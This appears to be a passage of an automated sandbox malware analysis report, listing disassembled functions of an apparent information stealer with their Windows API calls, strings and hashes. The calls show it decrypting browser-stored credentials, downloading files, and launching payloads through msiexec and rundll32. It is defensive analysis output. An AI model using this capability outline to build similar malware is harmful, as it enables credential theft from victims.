                                                                                    • StrStrA.SHLWAPI(00000000,02E3A190), ref: 0040CCB9
                                                                                      • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                                                      • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02E35F60), ref: 0040C871
                                                                                      • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                      • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                    • StrStrA.SHLWAPI(?,02E3A190,00000000,?,0042145C,00000000,?,00000000,02E35F60), ref: 0040CD5A
                                                                                    • StrStrA.SHLWAPI(00000000,02E35DE0), ref: 0040CD71
                                                                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3555725114-3916222277
                                                                                    • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                    • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                                                    • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                                                    • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                                                    Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • memset.MSVCRT ref: 00410C1C
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                    • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                    • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                                                    • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                                                    • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                                                    • memset.MSVCRT ref: 00410CCD
                                                                                    • memset.MSVCRT ref: 00410CE1
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                    • String ID: .exe
                                                                                    • API String ID: 1395395982-4119554291
                                                                                    • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                    • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                                                    • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                                                    • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                                                    Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateGlobalStream
                                                                                    • String ID: image/jpeg
                                                                                    • API String ID: 2244384528-3785015651
                                                                                    • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                    • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                                                    • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                                                    • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                                                    Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strtok_s.MSVCRT ref: 00411307
                                                                                    • strtok_s.MSVCRT ref: 00411750
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$lstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 348468850-0
                                                                                    • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                    • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                                                    • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                                                    • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                                                    Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExecuteShell$lstrcpy
                                                                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                    • API String ID: 2507796910-3625054190
                                                                                    • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                    • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                                                    • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                                                    • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                                                    Function 02D244E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D24505
                                                                                    • memset.MSVCRT ref: 02D2451C
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D24553
                                                                                    • lstrcat.KERNEL32(?,0064A30C), ref: 02D24572
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24586
                                                                                    • lstrcat.KERNEL32(?,0064A5D8), ref: 02D2459A
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D28FF7: GetFileAttributesA.KERNEL32(00000000,?,02D11DBB,?,?,0042565C,?,?,00420E1F), ref: 02D29006
                                                                                      • Part of subcall function 02D19F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 02D19FA0
                                                                                      • Part of subcall function 02D19F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 02D19FF9
                                                                                      • Part of subcall function 02D19C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                      • Part of subcall function 02D19C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                      • Part of subcall function 02D19C27: LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                      • Part of subcall function 02D19C27: ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                      • Part of subcall function 02D19C27: LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                      • Part of subcall function 02D19C27: CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                      • Part of subcall function 02D29627: GlobalAlloc.KERNEL32(00000000,02D24644,02D24644), ref: 02D2963A
                                                                                    • StrStrA.SHLWAPI(?,0064A0D8), ref: 02D2465A
                                                                                    • GlobalFree.KERNEL32(?), ref: 02D24779
                                                                                      • Part of subcall function 02D19D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D56
                                                                                      • Part of subcall function 02D19D27: LocalAlloc.KERNEL32(00000040,?,?,?,02D15155,00000000,?), ref: 02D19D68
                                                                                      • Part of subcall function 02D19D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02D15155,00000000,00000000), ref: 02D19D91
                                                                                      • Part of subcall function 02D19D27: LocalFree.KERNEL32(?,?,?,?,02D15155,00000000,?), ref: 02D19DA6
                                                                                      • Part of subcall function 02D1A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2470A
                                                                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 02D24727
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02D24739
                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02D2474C
                                                                                    • lstrcat.KERNEL32(00000000,00420FB8), ref: 02D2475B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1191620704-0
                                                                                    • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                    • Instruction ID: 9a2b76be05f084c9cf40e4b4c95fd11840db9e7e81d1fa200c8082b7fd0ff0ce
                                                                                    • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                    • Instruction Fuzzy Hash: 527132B5900218BBDB14EBE0DC55FEE737AEF59304F008598A605A7280DA75DB49CFA1
                                                                                    Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0041429E
                                                                                    • memset.MSVCRT ref: 004142B5
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                                                    • lstrcatA.KERNEL32(?,02E39C68), ref: 0041430B
                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                                                    • lstrcatA.KERNEL32(?,02E39848), ref: 00414333
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                                                      • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                      • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                                                    • StrStrA.SHLWAPI(?,02E39B90), ref: 004143F3
                                                                                    • GlobalFree.KERNEL32(?), ref: 00414512
                                                                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                                                    • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1191620704-0
                                                                                    • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                    • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                                                    • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                    • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                                                    Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406303
                                                                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                    • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3532888709-1526165396
                                                                                    • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                                                    • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                                                    Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406147
                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                                                    • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                                                    • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID: a+A$a+A
                                                                                    • API String ID: 4287319946-2847607090
                                                                                    • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                    • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                                                    • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                    • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                                                    Function 02D20CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • memset.MSVCRT ref: 02D20E83
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20E9C
                                                                                    • lstrcat.KERNEL32(?,00420D7C), ref: 02D20EAE
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EC4
                                                                                    • lstrcat.KERNEL32(?,00420D80), ref: 02D20ED6
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EEF
                                                                                    • lstrcat.KERNEL32(?,00420D84), ref: 02D20F01
                                                                                    • lstrlen.KERNEL32(?), ref: 02D20F0E
                                                                                    • memset.MSVCRT ref: 02D20F34
                                                                                    • memset.MSVCRT ref: 02D20F48
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
